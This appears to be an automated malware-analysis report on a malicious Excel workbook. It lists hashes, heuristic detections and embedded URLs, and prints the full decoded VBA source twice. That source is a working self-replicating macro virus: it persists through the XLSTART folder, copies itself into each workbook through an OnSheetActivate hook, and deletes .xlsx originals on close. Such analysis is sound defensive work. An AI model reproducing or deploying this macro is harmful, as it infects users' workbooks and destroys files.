Office (OLE) / .XLS malware analysis — malicious · 834b30ce8cd4023f

MALICIOUS

Office (OLE) / .XLS

3.01 MB Created: 2026-06-02 05:45:40 Authoring application: Microsoft Excel First seen: 2026-06-17

MD5: 12e7f688aeb62bb128d797af2554ab18 SHA-1: 2f288700389605257ca06d0daf9e6b7ec0faa21a SHA-256: 834b30ce8cd4023f830ecfd9e1a9cde39fe7329818b4b6efd69101eb516ac62a

118 Risk Score

Heuristics 6

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE

The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
Matched line in script
```
If ThisWorkbook.Path <> Application.StartupPath Then
```
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER

The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
Matched line in script
```
    Application.OnSheetActivate = ""
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub Auto_Close()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://qr.dingtalk.com/page/yunpan?route=previewDentry&spaceId=23176315866&fileId=202456854394&type=file In document text (OLE body)
- https://qr.dingtalk.com/page/yunpan?route=previewDentry&spaceId=23176315866&fileId=202499708366&type=fileIn document text (OLE body)
- https://qr.dingtalk.com/page/yunpan?route=previewDentry&spaceId=23176315866&fileId=202466853514&type=fileIn document text (OLE body)
- https://qr.dingtalk.com/page/yunpan?route=previewDentry&spaceId=23176315866&fileId=202467137476&type=fileIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1376 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1376 bytes
SHA-256: `1ef4ee495cbfaef36496b50a3eef252884ee17ae13c007bed5f33db50487486b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Kangatang" Sub Auto_Open() Application.EnableCancelKey = xlDisabled Application.DisplayAlerts = False On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath Then Application.ScreenUpdating = False Windows(1).Visible = False ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls" Windows(1).Visible = True End If Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "mypersonnel.xls!allocated" End Sub Sub Auto_Close() On Error Resume Next Application.DisplayAlerts = False If Right(ThisWorkbook.Name, 4) <> "xlsx" Or Application.Version <= 11 Then Exit Sub ThisWorkbook.SaveAs Filename:=ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xlsx", ".xls"), _ FileFormat:=xlExcel8, Password:="", WriteResPassword:="", _ ReadOnlyRecommended:=False, CreateBackup:=False Kill ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xls", ".xlsx") End Sub Sub allocated() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then Application.ScreenUpdating = False currentsh = ActiveSheet.Name ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1) ActiveWorkbook.Sheets(currentsh).Select Application.ScreenUpdating = True End If End Sub

SHA-256: 1ef4ee495cbfaef36496b50a3eef252884ee17ae13c007bed5f33db50487486b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Kangatang"

Sub Auto_Open()
Application.EnableCancelKey = xlDisabled



Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
    Application.ScreenUpdating = False
    Windows(1).Visible = False
    ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
    Windows(1).Visible = True
End If

    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub

Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
If Right(ThisWorkbook.Name, 4) <> "xlsx" Or Application.Version <= 11 Then Exit Sub
ThisWorkbook.SaveAs Filename:=ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xlsx", ".xls"), _
FileFormat:=xlExcel8, Password:="", WriteResPassword:="", _
ReadOnlyRecommended:=False, CreateBackup:=False
Kill ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xls", ".xlsx")
End Sub

Sub allocated()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
    Application.ScreenUpdating = False
    currentsh = ActiveSheet.Name
    ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
    ActiveWorkbook.Sheets(currentsh).Select
    Application.ScreenUpdating = True
 
 
 End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.